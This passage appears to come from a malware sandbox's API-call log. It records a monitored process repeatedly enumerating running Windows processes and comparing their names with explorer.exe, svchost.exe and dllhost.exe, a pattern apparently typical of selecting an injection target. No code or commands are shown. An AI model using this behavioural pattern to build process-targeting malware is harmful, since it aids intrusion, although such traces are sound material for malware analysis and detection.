(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0244.087] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0244.087] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0244.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0244.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0244.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0244.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0244.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0244.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0244.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0244.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0244.091] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.091] CloseHandle (hObject=0xd8) returned 1 [0244.091] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0244.091] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0244.091] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0244.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0244.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0244.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0244.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0244.092] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.092] CloseHandle (hObject=0xd8) returned 1 [0244.092] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0244.092] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0244.092] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0244.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0244.093] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0244.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0244.093] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0244.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0244.094] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.094] CloseHandle (hObject=0xd8) returned 1 [0244.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0244.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0244.094] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.094] CloseHandle (hObject=0xd8) returned 1 [0244.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0244.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0244.095] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.095] CloseHandle (hObject=0xd8) returned 1 [0244.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0244.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0244.095] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.095] CloseHandle (hObject=0xd8) returned 1 [0244.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0244.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0244.096] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.096] CloseHandle (hObject=0xd8) returned 1 [0244.096] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0244.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0244.097] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.097] CloseHandle (hObject=0xd8) returned 1 [0244.097] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0244.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0244.097] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.097] CloseHandle (hObject=0xd8) returned 1 [0244.097] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0244.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0244.098] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.098] CloseHandle (hObject=0xd8) returned 1 [0244.098] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0244.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0244.098] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.098] CloseHandle (hObject=0xd8) returned 1 [0244.098] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0244.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0244.099] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.099] CloseHandle (hObject=0xd8) returned 1 [0244.099] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0244.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0244.099] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.099] CloseHandle (hObject=0xd8) returned 1 [0244.100] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0244.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0244.100] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.100] CloseHandle (hObject=0xd8) returned 1 [0244.100] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0244.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0244.101] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.101] CloseHandle (hObject=0xd8) returned 1 [0244.101] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0244.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0244.101] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.101] CloseHandle (hObject=0xd8) returned 1 [0244.101] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0244.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0244.102] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.102] CloseHandle (hObject=0xd8) returned 1 [0244.102] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0244.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0244.103] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.103] CloseHandle (hObject=0xd8) returned 1 [0244.103] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0244.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0244.103] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.103] CloseHandle (hObject=0xd8) returned 1 [0244.103] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0244.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0244.104] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.104] CloseHandle (hObject=0xd8) returned 1 [0244.104] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0244.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0244.104] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.104] CloseHandle (hObject=0xd8) returned 1 [0244.104] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0244.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0244.105] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.105] CloseHandle (hObject=0xd8) returned 1 [0244.105] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0244.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0244.106] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.106] CloseHandle (hObject=0xd8) returned 1 [0244.106] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0244.106] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0244.107] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0244.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0244.107] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0244.108] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0244.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0244.108] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0244.109] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.109] CloseHandle (hObject=0xd8) returned 1 [0244.109] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0244.109] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0244.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0244.109] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.109] CloseHandle (hObject=0xd8) returned 1 [0244.109] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0244.109] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0244.109] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0244.109] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0244.110] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0244.110] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.110] CloseHandle (hObject=0xd8) returned 1 [0244.110] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0244.111] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.111] CloseHandle (hObject=0xd8) returned 1 [0244.111] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0244.111] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0244.112] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0244.112] CloseHandle (hObject=0xd8) returned 1 [0244.112] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.112] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0244.113] CloseHandle (hObject=0xd4) returned 1 [0244.113] Sleep (dwMilliseconds=0x3e8) [0245.116] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0245.118] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0245.118] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0245.119] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0245.119] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0245.120] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0245.120] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 